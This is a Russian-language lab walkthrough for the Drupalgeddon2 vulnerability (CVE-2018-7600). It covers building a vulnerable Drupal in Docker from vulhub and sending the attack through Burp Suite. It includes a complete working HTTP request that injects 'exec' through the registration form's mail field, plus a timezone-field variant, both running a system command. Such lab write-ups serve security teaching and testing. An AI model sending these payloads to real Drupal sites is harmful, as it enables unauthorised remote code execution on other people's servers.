
Эксплойт для проверки концепции для CVE-2018-7600 (Drupalgeddon 2) с пошаговой настройкой лабораторной среды и руководством по эксплуатации с использованием Docker и Burp Suite.
Версии Drupal до 7.58, 8.x до 8.3.9, 8.4.x до 8.4.6, 8.5.x до 8.5.1 позволяют удаленному злоумышленнику выполнить произвольный код из-за проблемы, затрагивающей несколько подсистем, использующих базовую или общую конфигурацию модулей, включая Form API.
Ссылки:

Сначала форкаем содержимое соответствующего vulhub, как показано на следующем экране.

Затем скачиваем эту папку как ZIP-файл и извлекаем.

Распаковываем содержимое, связанное с Drupal (CVE-2018-7600), и загружаем в свой репозиторий.

Теперь через этот репозиторий настроим соответствующую среду в Docker.

Клонируем свой репозиторий с помощью команды git clone, как показано ниже, и переходим в папку, где находится файл docker-compose.yml. Затем запускаем Docker в фоновом режиме следующей командой:
docker-compose up -d
Можно увидеть, что он запускается, как показано ниже.

Переходим по адресу http://localhost:8080 и заходим на главную страницу Drupal.

Появляется экран настройки среды Drupal и затем главная страница Drupal.
Для эксплуатации выполняем простую настройку, как показано ниже.

Загружается следующим образом.

Затем вводим дополнительные настройки сайта (для быстрой настройки эксплуатации устанавливаем test).



Окончательно настройка сайта Drupal завершена, как показано ниже.

Ссылаясь на a2u/CVE-2018-7600, можно отправить следующий запрос к Drupal.
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
CVE-2018-7600 (Drupalgeddon2) — это уязвимость, позволяющая неаутентифицированную атаку через манипуляцию полями формы с помощью AJAX через /user/register, поэтому можно попробовать изменить пакеты через Burp Suite.
Сначала через прокси-сайт Burp Suite заходим в регистрацию, вводим любое значение и захватываем пакет.

Используя Burp Suite, изменяем этот пакет.

Отправляем этот пакет в Repeater и добавляем внизу следующий код:
element_parents = timezone/timezone/#value
ajax_form = 1
_wrapper_format = drupal_ajax
timezone[timezone] = id
После отправки (Send) можно увидеть команду OK, как показано ниже.

На самом деле, для более вредоносного запроса атака CVE-2018-7600 (Drupalgeddon2) более надежна, если отправить ее сразу после установки Drupal (до завершения мастера установки Drupal).